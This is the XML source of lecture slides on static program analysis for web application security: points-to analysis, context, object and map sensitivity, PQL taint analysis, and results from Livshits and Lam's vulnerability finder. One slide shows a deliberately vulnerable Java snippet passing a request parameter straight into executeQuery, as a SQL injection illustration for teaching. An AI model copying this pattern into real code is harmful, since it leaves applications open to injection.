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6" y="-30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75846F8-EA63-4E8B-ABEC-B707E4DCD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6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78611B-5FDC-48B4-8F7A-8AFB0E145E22}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>1</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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2974F4-3AA8-4A03-B50B-80CCBEB30253}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>10</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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5C7DA6-573A-494D-A7CF-60B724C9E4AD}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>11</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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55BB4F-5BD2-403F-A200-098B425D0559}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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3BAC02-BCE4-49D9-A66B-C1458AF39883}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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B582A0-39BB-4D04-BFF5-6BDBD434EC64}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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F7FAD-7ED4-4AE4-8CA6-07070B44C659}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>15</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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C849C6-9380-4673-AC46-69871DAA4DEA}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>16</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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281D65-A74A-490E-B626-FE1CA5748984}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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3634F7-1B24-44CE-82EE-1959F957FCA3}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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29B2C4-11AE-4CF3-A9A6-6E98417A3217}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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F21FB9-AC94-4D3A-A7BB-88AD3E3FFFAE}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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F842B7-0395-4147-888F-24B8A4AEEC7D}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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3B40CB-C25B-412B-A8BD-71318C4189A1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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012F3B-EE0A-475D-9942-B5AA2033CB53}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>22</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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3A142C-A978-4C97-8A4D-C2B451E58787}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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B7F8CF-6CE4-493F-B5B7-E68C42800742}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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E3C4F9-D590-4B4A-9A78-2C5F2EB0ADF4}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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5C12F0-BA3C-4ECC-A77C-36BE9191411A}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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C31A91-44B2-42BC-A4AD-7C8CF7378CD6}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>27</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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38E322-03A4-419A-9949-BE152A8A3B67}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>28</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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3935A9-DBC0-436B-907C-AF962A3087E1}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>29</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66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51E6FA-A176-4955-B117-B0128496143F}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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252146-70B1-4888-8671-26FF54433946}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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FFC36C-B882-4DD1-879C-87B19EF15768}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>31</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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BE2A4D-6A5E-4AF9-AE95-5037CA91D916}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>32</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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6C8CB3-3977-425A-B2DE-0D9ABD86F94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2F7416-D8BC-4D6D-84F7-62C5F3FD2752}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>34</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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CCA32D-9511-48B7-9D22-F0CEA1826237}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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AFEA86-B760-4AFF-A2F1-3619953020FF}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US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CAED79-D797-47B2-B207-C55E30C5CE24}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>6</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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746C8E-986F-45E3-850A-961CF26F043E}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>7</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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29284E-099E-4EB8-8CCC-2D0584AF5D13}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>8</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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2E7C1A-5576-4529-B7B5-31E852682817}" type="slidenum">
              <a:rPr lang="en-US"/>
              <a:pPr/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp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6242BE-9093-4031-82F0-2DBEDB791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2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723F31-C619-4205-A1C2-E1AA37810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1EDCAD-0686-4DC1-A4D0-3C0BAB3A7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4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DCDFCB-9484-4ABF-930E-85D7AD12B1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D040BD-0729-4954-A97A-0BF3F86E21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1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2087F4-59A6-4FDF-A0CC-A37B231D71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1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6AB5C6-CD55-44F4-949A-C3C2ADB11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ED2DB3-4912-434B-AC7A-32A350D82A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7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76AD37-FA43-4153-B08B-098BD1A58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E1B626-3375-4DB2-ADE9-9845C601CF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9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A92FC3-DDCD-45E5-8B06-AC3A8892D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9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2010-05-03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18238"/>
            <a:ext cx="2892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Static Analysis and Web App Security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EC97BF7-A564-4DA4-B27E-454598546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Program Analysis for Web Application Security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Presented by Justin Samuel</a:t>
            </a:r>
          </a:p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For UW CSE 504, Spring ‘10</a:t>
            </a:r>
          </a:p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Instructor: Ben Livshits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Exponentially many points-to results.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Use Binary Decision Diagrams (BDDs) for solving points-to analysis  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[Berndl, PLDI ‘03]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solidFill>
                <a:srgbClr val="A6A6A6"/>
              </a:solidFill>
              <a:latin typeface="Arial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solidFill>
                <a:srgbClr val="A6A6A6"/>
              </a:solidFill>
              <a:latin typeface="Arial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solidFill>
                <a:srgbClr val="A6A6A6"/>
              </a:solidFill>
              <a:latin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Use BDD-Based Deductive DataBase (bddbddb) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[Whaley &amp; Lam, PLDI ‘04]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Express pointer analysis in Datalog (logic programming language).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Translate Datalog into efficient BDD implementations.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sz="2000">
              <a:latin typeface="Arial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895600"/>
            <a:ext cx="2219325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Scalability of Context-Sensitivity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54988148-7344-4D2D-926E-5A8B59D52E64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10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19800" y="3087688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A6A6A6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Image: http://en.wikipedia.org/wiki/Binary_decision_diagram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Imprecision From Object-Insensitivity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5791200"/>
            <a:ext cx="8229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</a:rPr>
              <a:t>pointsto( v : Var,  h : Heap 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70C8369B-44CD-4061-B557-3D290F4A9245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11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3581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 = new Foo();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y = new Foo();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a = new Bar();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b = new Bar();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x.v = a;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y.v = b;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181600" y="2819400"/>
            <a:ext cx="2514600" cy="1981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16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="F6924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x, y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181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7086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6172200" y="29718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v</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="13323" name="AutoShape 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="13320" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2362200"/>
            <a:ext cx="685800" cy="649288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4" name="AutoShape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="13321" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6781800" y="2362200"/>
            <a:ext cx="609600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5800" y="5257800"/>
            <a:ext cx="8104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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note:  this is actually showing field sensitivity, not object sensitivity.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4989513" y="2819400"/>
            <a:ext cx="9906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16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="F6924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Object-Sensitivity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5791200"/>
            <a:ext cx="8229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</a:rPr>
              <a:t>pointsto( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vo : Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, v : Var,  h : Heap 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D403CBD8-387D-4B49-88AA-B068434B923F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12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85800" y="2133600"/>
            <a:ext cx="3581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 = new Foo();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y = new Foo();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a = new Bar();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b = new Bar();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x.v = a;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y.v = b;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180013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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14345" name="AutoShape 9"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="14344" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5484813" y="2362200"/>
            <a:ext cx="3175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5180013" y="29718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v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6897688" y="2819400"/>
            <a:ext cx="9906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16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="F6924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088188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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14349" name="AutoShape 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="14348" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7392988" y="2362200"/>
            <a:ext cx="1587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088188" y="29718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v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85800" y="5257800"/>
            <a:ext cx="8104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r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note:  this is actually showing field sensitivity, not object sensitivity.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Imprecision From Maps/Collections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5181600"/>
            <a:ext cx="82296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Maps with constant strings are common.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86482358-EB84-400C-A65E-0865BEEE828E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13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4267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HashMap map = new HashMap(); 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String x = req.getParam(“x”);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map.put(“NAME”, x);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String t = “boss”;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map.put(“TITLE”, t);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String y = map.get(“TITLE”);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181600" y="2819400"/>
            <a:ext cx="2514600" cy="1981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16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="F6924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181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x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71628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y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5829300" y="2971800"/>
            <a:ext cx="12192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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15371" name="AutoShape 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="15368" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2362200"/>
            <a:ext cx="685800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2" name="AutoShape 12"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="15369" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="6858000" y="2362200"/>
            <a:ext cx="609600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1341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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="15374" name="AutoShape 14"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438900" y="2362200"/>
            <a:ext cx="1588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Map-sensitivity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5181600"/>
            <a:ext cx="82296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Model HashMap.put/get operations specially.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CC701BCD-4CFB-41BA-A53B-6265DA9B43D7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14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4267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HashMap map = new HashMap(); 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String x = req.getParam(“x”);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map.put(“NAME”, x);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String t = “boss”;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map.put(“TITLE”, t);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String y = map.get(“TITLE”);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5181600" y="2819400"/>
            <a:ext cx="2514600" cy="1981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16200000" scaled="1"/>
          </a:gradFill>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="F6924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5181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x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71628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y</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16394" name="AutoShape 10"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="16392" idx="2"/>
            <a:endCxn id="16399" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5486400" y="2362200"/>
            <a:ext cx="361950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5" name="AutoShape 11"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="16393" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7237413" y="2362200"/>
            <a:ext cx="230187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61341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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16397" name="AutoShape 13"/>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks noChangeShapeType="1"/>
            <a:stCxn id="16396" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6438900" y="2362200"/>
            <a:ext cx="342900" cy="649288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6502400" y="2971800"/>
            <a:ext cx="10541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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“TITLE”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5268913" y="2971800"/>
            <a:ext cx="1158875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FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“NAME”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Flow-Sensitivity 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Flow-sensitive analysis computes a different solution for each point in the program.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Common difficulties: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Strong updates difficult, thus weak updates used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"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Is this a problem for functional languages?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Efficiency.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Approach: use only local flow (within methods).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2F0FAB59-E797-4138-8DD1-FFF82BCE7612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15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Putting It Together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Object-sensitivity + Context-sensitivity gives the following relation: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en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pointsto( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vc : VarContext, vo : Heap, v : Var,  h : Heap </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)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Plus map-sensitivity and special handling of Java string routines.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“1-level object-sensitivity” (?) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="A6A6A6"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>[Livshits slides]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>: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en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>pointsto( vc : VarContext, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="E46C0A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>vo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="E46C0A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E46C0A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> : Heap, vo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" baseline="-25000">
                <a:solidFill>
                  <a:srgbClr val="E46C0A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E46C0A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> : Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, v : Var,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en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="E46C0A"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ho : Heap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>, h : Heap )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sz="2000">
              <a:latin typeface="Arial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7202AA98-35F4-4896-99DA-C641AB66C332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16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524000" y="2057400"/>
            <a:ext cx="59928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1 String param = req.getParameter("user");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2 ...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3 String query = param;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4 ...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5 con.executeQuery(query);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28800" y="3200400"/>
            <a:ext cx="3200400" cy="334963"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="C050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73500" y="2057400"/>
            <a:ext cx="3289300" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="25560">
            <a:solidFill>
              <a:srgbClr val="8064A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Points-to Analysis and We’re Done?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4E91E99E-3459-4609-97AF-EBD35211FB62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17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7200" y="42672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Points-to analysis gives us static knowledge of what an object refers to at runtime.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To find missing input checks, we still need to identify objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>sources</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> and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sinks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="240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Use PQL for Taint Analysis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41363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Same PQL that we saw a few weeks ago.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Specify sources, derivations, and sinks.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E514F428-A408-4D49-BC92-13370828E325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18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429000"/>
            <a:ext cx="30765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3429000"/>
            <a:ext cx="2930525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3438525"/>
            <a:ext cx="1979612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476625" y="3124200"/>
            <a:ext cx="1588" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="7F7F7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643688" y="3124200"/>
            <a:ext cx="1587" cy="2209800"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="7F7F7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Integration with Eclipse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TODO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2F228E40-00BA-4B0B-B800-AAE5F655F0F0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19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899160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1997075"/>
            <a:ext cx="77724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Finding Security Vulnerabilities in Java Applications with Static Analysis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06450" y="3886200"/>
            <a:ext cx="75311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V. Benjamin Livshits and Monica S. Lam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en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Usenix Security ‘05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Vulnerabilities Discovered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Discovered 23 vulnerabilities in real applications.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Only 1 was already known.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>1 found in library (hibernate), another in J2EE implementation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="325"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1300">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>4 of the 23 are the same J2EE implementation error.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>“Almost all errors we reported to program maintainers were confirmed.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Also found 6 vulnerabilities in webgoat.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12 false positives.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="–"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1500">
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>All in one app (snipsnap) due to insufficient precision of object-naming.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="375"/>
              </a:spcBef>
              <a:buClrTx/>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1500">
              <a:latin typeface="Arial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38E351F6-9F74-413A-9279-1E8281A207D5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20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2534" name="Group 6"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="609600" y="3810000"/>
          <a:ext cx="7926388" cy="2341564"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="1528763"/>
                <a:gridCol w="1530350"/>
                <a:gridCol w="1392237"/>
                <a:gridCol w="1111250"/>
                <a:gridCol w="1390650"/>
                <a:gridCol w="973138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SQL injections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HTTP splitting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XSS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Path traversal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Header manip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Param. manip.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Cookie poison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Non-Web input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90000" marR="90000" marT="80892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Evaluation Summary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4495800"/>
            <a:ext cx="8229600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</a:rPr>
              <a:t>Summary of data on the number of tainted objects, reported security violations, and false positives for each analysis version.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr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</a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr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</a:rPr>
              <a:t>Enabled analysis features are indicated by checkmarks.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571625"/>
            <a:ext cx="818197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0658EFE7-426E-4A95-BF16-36F6787D4701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21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Number of Tainted Objects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524000"/>
            <a:ext cx="85915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781800" y="4238625"/>
            <a:ext cx="1674813" cy="1779588"/>
            <a:chOff x="4272" y="2670"/>
            <a:chExt cx="1055" cy="1121"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2458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670"/>
              <a:ext cx="1056" cy="1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272" y="2670"/>
              <a:ext cx="1056" cy="1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55626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</a:rPr>
              <a:t>Comparison of the number of tainted objects for each version of the analysis.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3401B555-9DA2-4CE9-A579-7B9F19744325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22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Timing Evaluation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26063486-E297-4872-A45D-41F723AA32DF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23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228600" y="2068513"/>
            <a:ext cx="5961063" cy="3589337"/>
            <a:chOff x="144" y="1303"/>
            <a:chExt cx="3755" cy="2261"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="2560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303"/>
              <a:ext cx="3756" cy="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144" y="1303"/>
              <a:ext cx="3756" cy="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2314575"/>
            <a:ext cx="29622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Limitations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Dynamic class loading and generation. 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Reflectively called classes. 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For reflective calls, a simple analysis is used that handles common uses of reflection.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endParaRPr lang="en-US" sz="2000"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D069EE59-67DD-45B7-9A2B-ED321E47B770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24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Essence of Command Injection Attacks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Zhendong Su and Gary Wassermann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en-US" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="898989"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>POPL ‘06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Taint Analysis is Not Sufficient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Sanitization of user input can be inaccurate.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Checked input is not always safe.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Inaccurate checking may allow it to alter the structure of commands constructed from the string.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F1BDEC4C-3DE8-43CA-8AA4-03E648A5F349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26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SQL Injection Parse Tree Example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CDEC3732-978E-412F-A777-57682584B0C0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27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676400"/>
